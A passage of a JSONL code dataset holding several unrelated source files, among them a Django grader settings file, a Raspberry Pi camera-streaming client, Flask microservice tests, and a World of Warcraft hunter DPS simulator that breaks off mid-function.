22)))\n","sub_path":"bitsmanip/test_52_binaryToString.py","file_name":"test_52_binaryToString.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"309484182","text":"DEBUG = True\n#SECRET_KEY = 'not a very secret key'\nADMINS = (\n)\n#ALLOWED_HOSTS = [\"*\"]\n\nSTATIC_ROOT = '/local/grader/static/'\nMEDIA_ROOT = '/local/grader/media/'\nSUBMISSION_PATH = '/local/grader/uploads'\nPERSONALIZED_CONTENT_PATH = '/local/grader/ex-meta'\nSTATIC_URL_HOST_INJECT = 'http://localhost:8080'\n\nCONTAINER_SCRIPT = '/srv/docker-compose-run.sh'\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': '/local/grader/db.sqlite3',\n }\n}\n\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n 'LOCATION': 'unique-snowflake',\n },\n}\n\nLOGGING['loggers'].update({\n '': {\n 'level': 'INFO',\n 'handlers': ['console'],\n 'propagate': True,\n },\n #'django.db.backends': {\n # 'level': 'DEBUG',\n #},\n})\n\n# kate: space-indent on; indent-width 4;\n# vim: set expandtab ts=4 sw=4:\n","sub_path":"rootfs/srv/grader-cont-settings.py","file_name":"grader-cont-settings.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"187204770","text":"import xlrd\n\nWS_NAMES = [ \"ETF\", \"MM_Arb\", \"MM - HFT\", \"OMM\", \"HTETF\", \"Warrant_CBBC\" ]\n\ndef xlsx_to_arrs(xlsx_file, worksheets=[]):\n\tarr = []\n\twb = xlrd.open_workbook(xlsx_file)\n\tws = None\n\tfor worksheet in worksheets:\n\t\ttry:\n\t\t\tws = wb.sheet_by_name(worksheet)\n\t\texcept:\n\t\t\tcontinue\n\n\t\trow_end = ws.nrows if row_end == -1 else row_end\n\t\tcol_end = ws.ncols if col_end == -1 else col_end\n\n\t\tarr = [ws.row_values(row, start_colx=col_start, end_colx=col_end) for row in range(row_start, row_end)]\n\t\theader = ','.join(x if x not in arr[0][:n] else x+str(n) for n, x in enumerate(arr[0]) )\n\n\treturn re.sub(r\"[\\*\\.#/\\$%\\\"\\(\\)& \\_]\", \"\", header), arr[1:]","sub_path":"pnl/ed_pnl.py","file_name":"ed_pnl.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"186586777","text":"import cv2\nimport io\nimport socket\nimport struct\nimport time\nimport pickle\nimport zlib\nfrom gpiozero import LED\n\nledgreen=LED(26)\nledred=LED(19)\nisKnown=False\nstart=0\nboolProcess=False\nledred.on()\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client_socket:\n client_socket.connect(('192.168.0.152', 8485))\n connection = client_socket.makefile('wb')\n cam = cv2.VideoCapture(0)\n cam.set(3, 320);\n cam.set(4, 240);\n encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 90]\n while True:\n ret, frame = cam.read()\n result, frame = cv2.imencode('.jpg', frame, encode_param)\n send_data = pickle.dumps(frame, 0)\n size = len(send_data)\n client_socket.sendall(struct.pack(\">L\", size) + send_data)\n client_data = client_socket.recv(1024)\n client_data.decode()\n client_data=str(client_data)\n if(client_data!=\"b'unknown'\"):\n isKnown=True\n start=time.time()\n if(isKnown==True):\n boolProcess=True\n if(time.time()-start<10):\n ledred.off()\n ledgreen.on()\n if(time.time()-start>11):\n start=0\n ledred.on()\n ledgreen.off()\n print(\"ledoff\")\n boolProcess=False\n isKnown=False\n print(client_data)\n cam.release()\n\n","sub_path":"pythonTest/client1.py","file_name":"client1.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"87710749","text":"import pytest\nfrom router_microservice import get_rest_microservice\nimport json\n\nclass UserObject(object):\n def __init__(self,metrics_ok=True):\n self.metrics_ok = metrics_ok\n\n def route(self,X,features_names):\n return 22\n \n def tags(self):\n return {\"mytag\":1}\n\n def metrics(self):\n if self.metrics_ok:\n return [{\"type\":\"COUNTER\",\"key\":\"mycounter\",\"value\":1}]\n else:\n return [{\"type\":\"BAD\",\"key\":\"mycounter\",\"value\":1}]\n\n\n\ndef test_router_ok():\n user_object = UserObject()\n app = get_rest_microservice(user_object,debug=True)\n client = app.test_client()\n rv = client.get('/route?json={\"data\":{\"ndarray\":[2]}}')\n j = json.loads(rv.data)\n print(j)\n assert rv.status_code == 200\n assert j[\"meta\"][\"tags\"] == {\"mytag\":1}\n assert j[\"meta\"][\"metrics\"] == user_object.metrics()\n assert j[\"data\"][\"ndarray\"] == [[22]] \n\ndef test_router_no_json():\n user_object = UserObject()\n app = get_rest_microservice(user_object,debug=True)\n client = app.test_client()\n uo = UserObject()\n rv = client.get('/route?')\n j = json.loads(rv.data)\n print(j)\n assert rv.status_code == 400\n\ndef test_router_bad_metrics():\n user_object = UserObject(metrics_ok=False)\n app = get_rest_microservice(user_object,debug=True)\n client = app.test_client()\n rv = client.get('/route?json={\"data\":{\"ndarray\":[]}}')\n j = json.loads(rv.data)\n print(j)\n assert rv.status_code == 400\n \n","sub_path":"wrappers/python/test_router_microservice.py","file_name":"test_router_microservice.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"625438991","text":"import numpy as np\nimport matplotlib.pyplot as pl\nfrom lnlikefn import QP, lnlike\n\nx = np.sort(np.random.rand(100))*10.\nyerr = .01*np.ones_like(x)\n\ntheta = [1., 1., 1., 5.]\nK = QP(x, x, theta) + np.diag(yerr**2)\n\npl.clf()\npl.imshow(K, cmap = 'gray', interpolation = 'nearest')\npl.savefig('K')\n\ny = np.random.multivariate_normal(np.zeros_like(x), K)\npl.clf()\npl.errorbar(x, y, yerr = yerr, fmt = 'k.')\npl.plot(x, y, 'b-')\npl.savefig('xy')\n\nP = np.arange(0.1, 3, 0.01)\nL = np.empty_like(P)\n\ntheta2 = np.array(theta)\nfor i, per in enumerate(P):\n theta2[1] = per\n L[i] = lnlike(theta2, x, y, yerr)\n\npl.clf()\npl.plot(P, L, 'k-')\npl.savefig('likelihood')\n","sub_path":"rotation/dantest.py","file_name":"dantest.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"597862709","text":"import random,time,math\nfrom Talents import Talents\nfrom Trinkets import Trinket\nimport Items\nimport SetBonuses\n\nstart = time.time() #used to track runtime of program \n\n#go to this website and paste the talent string u get at the bottom of the website http://calculators.iradei.eu/talents/hunter\ntalents = Talents('0000000000000000000000550201205000000000033301002500302300530350')\n\n#dictionary for buffs, key is the name of the buff and value is whether the buff is active or not.\nbuffsActive = {'agi_elixir':True,'mp5_elixir':True,'ap_flask':False,'mp5_food':False,'agi_scroll':True,'agi_food':True,'bom':True,'bow':True,'bok':True,'motw':True,'ai':True,'goa':True,'mst':True,'wft':True,'lotp':True,'fi':True,'aoth': True, 'aotw':False, 'quickshots': False, 'rapidfire': False, 'berserking': False,'drums_of_battle':False,'master_tactician':False}\nagility=intellect=spirit=power=mp5=crit_rating=crit_percent=agility_from_gear=intellect_from_gear=power_from_gear=hit=armor_pen=0\ncasting_haste=1 #casting speed modifier. This value is multiplied by spell casting times, so if you have rapid fire up, this value becomes 0.6 meaning steady shot's cast time is 1.5 * 0.6\n\nif buffsActive['bow']: mp5 += 40\nif buffsActive['motw']: agility,intellect,spirit = agility+14,intellect+14,spirit+14\nif buffsActive['ai']: intellect += 40\nif buffsActive['goa']: agility+=77\nif buffsActive['mst']: mp5+=50\nif buffsActive['agi_elixir']: agility,crit_rating = agility+35,crit_rating+20\nif buffsActive['agi_scroll']: agility+=20\nif buffsActive['agi_food']: agility+=20\nif buffsActive['lotp']: crit_percent=5\nif buffsActive['mp5_food']: mp5+=8\n\nhaste_rating_per_percent = 15.77\n\n#items\nhead=Items.item('beast lord helm')\nneck=Items.item('choker of vile intent')\nshoulders=Items.item('beast lord mantle')\ncloak=Items.item('drape of the dark reavers')\nchest=Items.item('beast lord quirass')\nbracers=Items.item('felstalker bracers')\ngloves=Items.item('beast lord handguards')\nbelt=Items.item('felstalker belt')\nlegs=Items.item('scaled greaves of patience')\nboots=Items.item('fiend slayer boots')\nring1=Items.item('truestrike ring')\nring2=Items.item('garonas signet ring')\ntrinket1=Items.item('bloodlust brooch')\ntrinket2=Items.item('hourglass of the unraveller')\nweapon=Items.item('sonic spear')\nranged=Items.item('Sunfury Bow of the Phoenix','ranged')\n\ngear = [head,neck,shoulders,cloak,chest,bracers,gloves,belt,legs,boots,ring1,ring2,trinket1,trinket2,weapon,ranged]\n#gear = [ranged]\n\nspeed = ranged['speed'] #ranged wep speed\nbase_speed = speed #incase speed gets changed, this value will have the original weapon speed\n\n#calculate stats gained from gear\nfor item in gear:\n agility_from_gear+=item['agility']\n intellect_from_gear+=item['intellect']\n power_from_gear+=item['power']\n crit_rating+=item['crit']\n mp5+=item['mp5']\n hit+=item['hit']\n armor_pen+=item['armor_pen']\n speed /= (((item['haste'] / haste_rating_per_percent) / 100) + 1)\n casting_haste += ((item['haste'] / haste_rating_per_percent) / 100)\n\n#calculate which set bonuses are applied\nSetBonuses.set_bonuses()\n#apply the stats gained from set bonuses\nhit += SetBonuses.bonuses['hit']\narmor_pen += SetBonuses.bonuses['armor_pen']\n\n#Character stats\nrace = 'troll'\nlevel = 70\nagility_from_race = 152\nagility += (agility_from_race + agility_from_gear)\nintellect_from_race = 73\nintellect += intellect_from_race + intellect_from_gear\nspirit += 84 #84 from race\npower_from_race = 140\npower_from_agi = agility-10\npower += (power_from_race + power_from_agi + power_from_gear) #140 from race 819 from gear\npower_modifier=1\ncrit_rating_per_percent = 22.08 #do not modify\nagility_per_crit_percent = 40 #do not modify\ncrit_from_race = 1 if ranged['type'] == 'bow' and race == 'troll' else 0 #Trolls get 1% crit with bows \ncrit_percent += -1.53 + crit_from_race + (crit_rating/crit_rating_per_percent) + (agility/agility_per_crit_percent) #crit starts at -1.53% for hunters\nquiver = 15 #quiver attack speed bonus\nmana_from_race = 3383 #3383 mana at lvl 70\nmaxmana = mana_from_race + (intellect*15) #15 mana for each point of intellect\nmana = maxmana\nbase_weapon_dmg_lower = ranged['weapondmglower'] #lower end of the weapon damage\nbase_weapon_dmg_upper = ranged['weapondmgupper'] #upper end of the weapon damage\nweapon_dps = ((base_weapon_dmg_lower+base_weapon_dmg_upper)/2) / speed\narrow_dps = 37 if ranged['name'] != 'Thoridal, The Stars Fury' else 0 #thori'dal doesn't use arrows, so we make arrow_dps 0 if you're using that bow\nweapon_dmg_lower = ((power / 14) * speed) + base_weapon_dmg_lower + (arrow_dps * speed)\nweapon_dmg_upper = ((power / 14) * speed) + base_weapon_dmg_upper + (arrow_dps * speed)\ncrit_bonus = 2.0\ndamage_modifier = 1\nhit_rating_per_percent = 106/6.72\n\n#auto shots and special shots per minute depending on rotation\nshot_frequency = {'1:1':{'auto_shot':60/speed,'steady_shot':60/speed}}\n\n#set bonus modifiers\npet_heal_modifier = SetBonuses.bonuses['pet_heal'] #t5 2pc\nsteady_shot_crit_modifier = SetBonuses.bonuses['steady_shot_crit'] #t5 4pc\naspect_of_the_viper_modifier = SetBonuses.bonuses['aspect_of_the_viper'] #t6 2pc\nsteady_shot_dmg_modifier = SetBonuses.bonuses['steady_shot_dmg'] #t6 4pc\n\n# MM Talent\nmulti_shot_modifier = 1\n\nif buffsActive['bom']: power += (220 * power_modifier)\nif buffsActive['aoth']: power+=(155 * power_modifier)\nif buffsActive['ap_flask']: power+=(120 * power_modifier)\n\n#create trinket objects\nbloodlust_brooch = Trinket('bloodlust brooch',20,120)\nbloodlust_brooch.on_use=True\nbloodlust_brooch.power=70\nbloodlust_brooch.on_power=278\n\nmark_of_conquest = Trinket('mark of conquest',0,17)\nmark_of_conquest.proc_chance_normal = mark_of_conquest.proc_chance_special = 13\nmark_of_conquest.power=54\nmark_of_conquest.mana = 150\nmark_of_conquest.on_hit=True\n\nhourglass_of_the_unraveller = Trinket('hourglass of the unraveller',10,45)\nhourglass_of_the_unraveller.on_power=300\nhourglass_of_the_unraveller.proc_chance_normal=hourglass_of_the_unraveller.proc_chance_special=10\nhourglass_of_the_unraveller.on_crit=True\nhourglass_of_the_unraveller.crit_rating=32\n\ntsunami_talisman = Trinket('tsunami talisman',10,45)\ntsunami_talisman.on_power=340\ntsunami_talisman.crit_rating=38\ntsunami_talisman.proc_chance_normal=tsunami_talisman.proc_chance_special=10\ntsunami_talisman.on_crit=True\n\nashtongue_talisman_of_swiftness = Trinket('ashtongue talisman of swiftness',8,0) # only procs from Steady Shot, with 15% chance\nashtongue_talisman_of_swiftness.proc_chance_special=15\nashtongue_talisman_of_swiftness.on_power=275\nashtongue_talisman_of_swiftness.on_hit=True\n\nmadness_of_the_betrayer = Trinket('madness of the betrayer',10,0) #1 proc per minute, 3.05% chance from auto, 4.5% chance from specials\nmadness_of_the_betrayer.proc_chance_normal = (speed/(60/1)*100) #PPM = 1\nmadness_of_the_betrayer.proc_chance_special = 0 #change this\nmadness_of_the_betrayer.on_armor_pen=300\nmadness_of_the_betrayer.on_hit=True\nmadness_of_the_betrayer.hit_rating=20\nmadness_of_the_betrayer.power=84\n\nshattered_sun_pendant_of_might = Trinket('shattered sun pendant of might',10,45)\nshattered_sun_pendant_of_might.proc_chance=10\nshattered_sun_pendant_of_might.on_power=200\nshattered_sun_pendant_of_might.on_hit=True\nshattered_sun_pendant_of_might.agility=18\nshattered_sun_pendant_of_might.power=64\n\nblackened_naaru_sliver = Trinket('blackened naaru sliver',20,45) #figure out how much time to get to max stacks, then find average ap during the 20 seconds\nblackened_naaru_sliver.proc_chance=10\nblackened_naaru_sliver.on_hit=True\n\nabacus_of_violent_odds = Trinket('abacus of violent odds',10,120)\nabacus_of_violent_odds.on_use=True\nabacus_of_violent_odds.on_haste=260\n\n#using this as the 2nd trinket when I'm testing only 1 trinket at a time\nempty_trinket = Trinket('empty trinket',0,0)\n\n#equipped trinkets\ntrinkets=[empty_trinket,shattered_sun_pendant_of_might]\n#print(trinkets[0].name,trinkets[1].name)\n#add the passive/not on-use stats on the trinkets\n\"\"\"for i in range(len(trinkets)):\n #print('ap',power,power+(trinkets[i].power) * power_modifier)\n power += (trinkets[i].power) * power_modifier\n #print('crit',crit_rating,crit_rating+trinkets[i].crit_rating)\n crit_rating += trinkets[i].crit_rating\n #print('crit%',crit_percent,crit_percent+trinkets[i].crit_rating/crit_rating_per_percent)\n crit_percent += trinkets[i].crit_rating/crit_rating_per_percent\n #print('hit',hit,hit+trinkets[i].hit_rating)\n hit += trinkets[i].hit_rating\"\"\"\n\n#pet stats\npet_base_damage_lower = 182\npet_base_damage_upper = 223\npet_power = 700\n\n#how much dps each class gets from 1 ap. Used to calculate expose weakness dps\ndps_per_ap = {'rogue':0.3905,'hunter':0.314,'bm_hunter_pet':0.247,'survival_pet':0.1145,'enhancement':0.3,'dps_warrior':0.278,'feral':0.16,'retribution':0.111112,'protection_warrior':0.0715}\n#add extra stats from blessing of kings\nif buffsActive['bok']:\n agility*=1.1\n intellect*=1.1\n spirit*=1.1\n\n#talents\nif talents.lightning_reflexes==5: agility*=1.15 #15% agility\nif talents.lethal_shots!=0: crit_percent+=talents.lethal_shots #5% crit\nif talents.mortal_shots!=0: crit_bonus+=((6*talents.mortal_shots)/100) #30% crit damage (6% for each point)\nif talents.combat_experience!=0: #2% agi and 6% int\n agility*=1.02\n intellect*=1.06\nif talents.careful_aim!=0: power+=(intellect*(1+((talents.careful_aim*15)/100))*power_modifier) #45% of intellect as attack power (15% per point)\nif talents.master_marksman!=0: #10% ap (2% per point)\n power*=(1+((talents.master_marksman*2)/100))\n power_modifier+=((talents.master_marksman*2)/100)\nif talents.survival_instincts!=0: #4% ap (2% per point)\n power*=(1+((talents.survival_instincts*2)/100))\n power_modifier+=((talents.survival_instincts*2)/100)\nif talents.killer_insticts!=0: crit_percent+=talents.killer_insticts #3% crit (1% each point)\nif talents.barrage!=0: multi_shot_modifier+=((talents.barrage*4)/100)\n\ncleave = False\ncleave_targets = 3\ntimer = 0\niteration_counter = 0\niterations = 1001 #the amount of fights the program will simulate, then find the median dps from those fights. The more iterations the more accurate but the longer it takes\nmaxtime = 300 #for how long each iteration will run, in seconds\niteration_time=maxtime #time will be used as the countdown, the maxtime variable just exists for calculating the dps so I know how long the program was running after it finishes running.\nwait_time = 0 #this is used as a cast time, so if you're casting an ability with a cast time of 2 seconds, this becomes 2 and you spend 2 seconds in a loop doing nothing, simulating a cast time\ngcd = 0 #global cooldown for the player, so if this is more than 0, the player has to wait for it to reach 0 before he can use an ability on the global cooldown\ngcdVal = 1.5 #hunter abilities are on a 1.5s global cooldown\naa_gcd = 0 #gcd for auto shot, only matters for instant cast abilities since auto shot can't be instant after using them, but instead goes on a 0.5s gcd\naa_gcd_val = 0.5\ntime_per_frame = 0.01\nmp5_time = 0\niterations_damage = list()\nexpose_weakness_uptime_list = list()\nexpose_weakness_uptime = 0\nexpose_weakness_dps = 0\nexpose_weakness_dps_list = list()\nkill_command_window = 0 #when u crit u get 5 seconds to use kill command, this keeps track of whether that window is open or not\n\ndamage = 0 #total damage counter\nbuffs = {'quickshots': 0, 'rapidfire': 0, 'berserking': 0,'drums_of_battle':0,'master_tactician':0} #active buffs, the key is the buff name and the value is the duration.\nhunters_mark_timer = 5000000 #the debuff timer on hunter's mark\nhunters_mark_attacks = 30 #how many attacks have been on the target with hunter's mark up (30 attacks = extra 330 attack power)\n\n#Ability cooldowns\ncooldowns = {'multi_shot':0,'arcane_shot':0,'misdirection':0,'demonic_rune':0,'mana_potion':0,'drums':0,'auto_shot':0,'rapid_fire':0,'berserking':0,'kill_command':0}\n#puts trinket names in the cooldowns/buffsactive/buffs dictionaries so as to avoid an Out of Bounds Index error\ncooldowns[trinkets[0].name] = 0\ncooldowns[trinkets[1].name] = 0\nbuffsActive[trinkets[0].name] = False\nbuffsActive[trinkets[1].name] = False\nbuffs[trinkets[0].name] = 0\nbuffs[trinkets[1].name] = 0\n\nboss_max_hp = 5700000\nboss_hp = boss_max_hp\nboss_armor = 7700 - armor_pen #7700 is the armor for the majority of bosses in TBC (at least t4 and t5). Adjust this as you wish if you're testing against a specific boss.\nboss_debuffs = {'sunder':True,'faerie':True,'cor':True,'iseal_of_the_crusader':True,'jow':True,'expose_weakness':False}\nboss_debuff_timers = {'expose_weakness':0}\nif boss_debuffs['sunder']:\n boss_armor -= 2600\nif boss_debuffs['faerie']:\n boss_armor -= 800\nif boss_debuffs['cor']:\n boss_armor -= 610\nboss_armor_reduction = 1 - (boss_armor / (boss_armor+400+85*(level+4.5*(70-59))))\nif boss_debuffs['iseal_of_the_crusader']:\n crit_percent+=3\n#adjusts the ranged weapon speed based on the attack speed % gained from the quiver\nif quiver > 0: \n speed /= 1 + (quiver / 100)\n casting_haste += (quiver / 100)\n#boss armor mitigation formula taken from wow.gamepedia.com not sure if this is how it is in TBC, needs further research\nif buffsActive['fi']: #ferocious inspiration (bm hunter buff)\n damage_modifier+=0.02\nexpose_weakness_ap = 0 #track the AP given by the expose weakness\n\n#warning if the hit with current gearset is under the cap\nif hit < math.ceil(((hit_rating_per_percent*9)-(talents.surefooted*hit_rating_per_percent))):\n print('hit too low', hit)\n\nrotations = {'3:2':['aa','ss','ss','aa','ss'],'1:1.5':['aa','ss','ms','aa','ss','aa','ss','as','aa','ss'],'1:1':['aa','ss']}\nrotation = '1:1.5'\nrotation_index = 0\n\ndebugging = False\n\nmadness_uptime=0\nmadness_uptime_list = list()\n\n#Simulation\ndef main(): \n global cooldowns,maxtime,iteration_time,wait_time,gcd,race,agility,intellect,spirit,speed,power,hit,crit_rating,crit_percent,quiver,mana,mp5,gcdVal,casting_haste,damage,buffs,buffsActive,hunters_mark_timer,hunters_mark_attacks,aa_gcd,total_dmg,timer,trinkets,madness_uptime_list,madness_uptime,iteration_counter\n iteration_time=maxtime\n # function that makes the imaginary time in the simulation pass, 0.1 second at a time.\n # this is used as well to make all buff durations and ability cooldown etc pass and if the buff duration reaches 0, it deactivates the buff\n def pass_time():\n global iteration_time,wait_time,gcd,hunters_mark_timer,buffs,speed,casting_haste,power,aa_gcd,mp5_time,mana,gcdVal,expose_weakness_ap,expose_weakness_uptime,expose_weakness_dps,timer,kill_command_window,armor_pen,crit_percent,counter,madness_uptime\n iteration_time-=time_per_frame\n wait_time-=time_per_frame\n gcd -= time_per_frame\n aa_gcd -= time_per_frame\n timer += time_per_frame\n kill_command_window -= time_per_frame\n hunters_mark_timer -= time_per_frame\n #if buffsActive['madness of the betrayer']:\n #madness_uptime += time_per_frame\n for buff in buffs:\n buffs[buff]-=time_per_frame\n boss_debuff_timers['expose_weakness']-=time_per_frame\n mp5_time += time_per_frame\n if boss_debuffs['expose_weakness']:\n expose_weakness_uptime+=time_per_frame\n for ability in cooldowns:\n cooldowns[ability]-=time_per_frame\n for a in range(len(trinkets)):\n if buffs[trinkets[a].name] <= 0 and buffsActive[trinkets[a].name]:\n buffsActive[trinkets[a].name] = False\n power -= (trinkets[a].on_power * power_modifier)\n armor_pen -= trinkets[a].on_armor_pen\n h = (trinkets[a].on_haste / haste_rating_per_percent) / 100\n speed *= (1 + h)\n casting_haste += h\n #TODO change this into a function and put the values for each buff into an array and another array saying what the value is (haste/agility/attack power or w/e) and they all use the same array index\n if buffs['quickshots'] <= 0 and buffsActive['quickshots']:\n buffsActive['quickshots'] = False\n speed *= 1.15\n casting_haste -= 0.15\n gcdVal *= 1.15\n if buffs['rapidfire'] <= 0 and buffsActive['rapidfire']:\n buffsActive['rapidfire'] = False\n speed *= 1.4\n casting_haste -= 0.4\n gcdVal *= 1.4\n if buffs['berserking'] <= 0 and buffsActive['berserking']:\n buffsActive['berserking'] = False\n speed *= 1.1\n casting_haste -= 0.1\n gcdVal *= 1.1\n if buffs['drums_of_battle'] <= 0 and buffsActive['drums_of_battle']:\n buffsActive['drums_of_battle'] = False\n speed*=(1+((80/haste_rating_per_percent)/100))\n casting_haste-=((80/haste_rating_per_percent)/100)\n if buffs['master_tactician'] <= 0 and buffsActive['master_tactician']:\n crit_percent -= (talents.master_tactician * 2)\n buffsActive['master_tactician'] = False\n if boss_debuff_timers['expose_weakness'] <= 0 and boss_debuffs['expose_weakness']:\n boss_debuffs['expose_weakness'] = False\n expose_weakness_ap = 0\n if mp5_time >= 5:\n mana += mp5\n mp5_time = 0\n if mana > maxmana:\n mana = maxmana\n if hunters_mark_timer <= 0:\n hunters_mark_attacks = 0\n def wait_gcd():\n global speed,damage,casting_haste,gcdVal,debugging\n while gcd > 0:\n if cooldowns['auto_shot'] <= 0 and aa_gcd <= 0 and rotations[rotation][rotation_index] == 'aa':\n cast('auto_shot',0,0,speed,aa_gcd,False)\n increment_rotation()\n pass_time()\n #used to simulate a cast bar, 's' is the cast time\n def wait(s):\n global time_per_frame\n t = s\n while t > time_per_frame:\n pass_time()\n t-=time_per_frame\n pass_time()\n\n def cast(spell,gcdd,manacost,cd,cast_time,waiting_gcd):\n global gcd,mana,cooldowns,cleave,damage,talents,debugging,aa_gcd,buffsa,buffsActive,speed,casting_haste,gcdVal\n if waiting_gcd:\n wait_gcd()\n wait(cast_time)\n\n if spell == 'multi_shot':\n while cooldowns['multi_shot'] > 0:\n pass_time()\n if debugging:\n print('multi-shot')\n basedmg = 205\n dmgfromap = ((power+expose_weakness_ap+get_hunters_mark_ap())/14)\n #if it's a cleave fight, multi shot hits 3 targets\n if cleave:\n for _ in range(cleave_targets-1):\n #The False parameter indicates that this is not a crit against the main target (boss) meaning it won't refresh the expose weakness debuff on the boss\n if is_crit(False):\n damage += ((((base_weapon_dmg_lower+base_weapon_dmg_upper) / 2) + (arrow_dps * base_speed) + dmgfromap + basedmg) * crit_bonus) * ((damage_modifier+multi_shot_modifier)-1) * boss_armor_reduction\n if talents.thrill_of_the_hunt!=0: mana += mana_cost * 0.4 * (talents.thrill_of_the_hunt/3) #change so instead of getting x% of the amount, it rolls to either get nothing, or the full 40% amount\n else:\n damage += (((base_weapon_dmg_lower+base_weapon_dmg_upper) / 2) + (arrow_dps * base_speed) + dmgfromap + basedmg) * ((damage_modifier+multi_shot_modifier)-1) * boss_armor_reduction\n if is_crit():\n damage += ((((base_weapon_dmg_lower+base_weapon_dmg_upper) / 2) + (arrow_dps * base_speed) + dmgfromap + basedmg) * crit_bonus) * ((damage_modifier+multi_shot_modifier)-1) * boss_armor_reduction\n if talents.thrill_of_the_hunt!=0: mana += mana_cost * 0.4 * (talents.thrill_of_the_hunt/3) #change so instead of getting x% of the amount, it rolls to either get nothing, or the full 40% amount\n else:\n damage += (((base_weapon_dmg_lower+base_weapon_dmg_upper) / 2) + (arrow_dps * base_speed) + dmgfromap + basedmg) * ((damage_modifier+multi_shot_modifier)-1) * boss_armor_reduction\n if is_crit():\n damage += ((((base_weapon_dmg_lower+base_weapon_dmg_upper) / 2) + (arrow_dps * base_speed) + dmgfromap + basedmg) * crit_bonus) * ((damage_modifier+multi_shot_modifier)-1) * boss_armor_reduction\n if talents.thrill_of_the_hunt!=0: mana += mana_cost * 0.4 * (talents.thrill_of_the_hunt/3) #change so instead of getting x% of the amount, it rolls to either get nothing, or the full 40% amount\n else:\n damage += (((base_weapon_dmg_lower+base_weapon_dmg_upper) / 2) + (arrow_dps * base_speed) + dmgfromap + basedmg) * ((damage_modifier+multi_shot_modifier)-1) * boss_armor_reduction\n attack()\n elif spell == 'arcane_shot':\n while cooldowns['arcane_shot'] > 0:\n pass_time()\n if debugging:\n print('arcane shot')\n aa_gcd = aa_gcd_val\n basedmg = 273\n dmgfromap = (power + expose_weakness_ap + get_hunters_mark_ap())*0.15\n if is_crit():\n damage += ((basedmg + dmgfromap) * crit_bonus) * damage_modifier\n if talents.thrill_of_the_hunt!=0: mana += mana_cost * 0.4 * (talents.thrill_of_the_hunt/3) #change so instead of getting x% of the amount, it rolls to either get nothing, or the full 40% amount\n else:\n damage += (basedmg + dmgfromap) * damage_modifier\n attack()\n elif spell == 'auto_shot':\n while cooldowns['auto_shot'] > 0:\n pass_time()\n if debugging:\n print('auto shot')\n if is_crit():\n #if it's a critical hit, take a random number between the lower and upper range multiplied by 2 or 2.3 depending on talents\n damage += ((((base_weapon_dmg_lower + base_weapon_dmg_upper) / 2) + (arrow_dps * base_speed) + (((power+expose_weakness_ap+get_hunters_mark_ap())/14) * base_speed) * crit_bonus) * damage_modifier) * boss_armor_reduction\n else:\n #if it's not a crit, select a random number between the lower and upper range\n damage += (((base_weapon_dmg_lower + base_weapon_dmg_upper) / 2) + (arrow_dps * base_speed) + (((power+expose_weakness_ap+get_hunters_mark_ap())/14) * base_speed) * damage_modifier) * boss_armor_reduction\n attack()\n\n #Improved Aspect of the Hawk proc roll\n if buffsActive['aoth'] and talents.iaoth != 0:\n i = random.randint(1,100)\n if i >= 1 and i <= 10:\n buffs['quickshots'] = 12\n if not buffsActive['quickshots']:\n old_speed = speed\n speed /= (1 + ((talents.iaoth*3)/100))\n casting_haste += ((talents.iaoth*3)/100)\n gcdVal /= (1 + ((talents.iaoth*3)/100))\n recalculate_rotation(old_speed)\n buffsActive['quickshots'] = True\n elif spell == 'steady_shot':\n if debugging:\n print('steady shot')\n basedmg = 150\n dmgfromap = (power+expose_weakness_ap+get_hunters_mark_ap())*0.2\n #roll for crit or not\n if is_crit(True,True): #First paremeter is whether it's on the main target (only used for cleave) and second paremeter is whether it's Steady Shot or not, for calculating the 4pc t5 bonus\n damage += (((basedmg + dmgfromap + ((base_weapon_dmg_lower + base_weapon_dmg_upper) / 2)) * crit_bonus) * (damage_modifier + steady_shot_dmg_modifier - 1)) * boss_armor_reduction\n if talents.thrill_of_the_hunt!=0: mana += mana_cost * 0.4 * (talents.thrill_of_the_hunt/3) #change so instead of getting x% of the amount, it rolls to either get nothing, or the full 40% amount\n else:\n damage += ((basedmg + dmgfromap + ((base_weapon_dmg_lower + base_weapon_dmg_upper) / 2)) * (damage_modifier + steady_shot_dmg_modifier - 1)) * boss_armor_reduction\n attack()\n\n cooldowns[spell] = cd\n gcd = gcdd\n mana -= manacost\n\n #use RNG to see if it's a critical hit\n #roll between 100 and 10000 instead of between 1 and 100 so the crit percent is an integer instead of a double. 28.81% becomes 2881 so it's more accurate\n def is_crit(main_target=True,Steady_Shot=False):\n global expose_weakness_ap,power,kill_command_window\n i = random.randint(100,10000)\n is_crit=False\n crt = crit_percent if Steady_Shot == False else crit_percent+steady_shot_crit_modifier #if 4pc t5 is equipped then Steady Shot gets 5% more crit\n if i >= 100 and i <= (crt*100):\n is_crit=True\n if main_target:\n boss_debuff_timers['expose_weakness'] = 7\n if expose_weakness_ap < agility*0.25:\n expose_weakness_ap = agility*0.25\n boss_debuffs['expose_weakness'] = True\n kill_command_window = 5\n trinket_proc(True) #True because it's a crit\n else:\n trinket_proc(False) #False because it's not a crit\n return is_crit\n\n #returns a float, how much damage expose weakness gave during the fight\n def calculate_expose_weakness_dps():\n number_of_class={'rogue':1,'hunter':2,'bm_hunter_pet':2,'survival_pet':1,'enhancement':2,'dps_warrior':1,'feral':1,'retribution':1,'protection_warrior':1}\n d = 0\n exposeap = agility*0.25\n for c,n in number_of_class.items():\n d += dps_per_ap[c] * exposeap * n\n return d\n\n #returns how much ap hunters mark is giving\n def get_hunters_mark_ap():\n if hunters_mark_timer > 0:\n if hunters_mark_attacks >= 30:\n return 440\n else:\n return hunters_mark_attacks * 11\n return 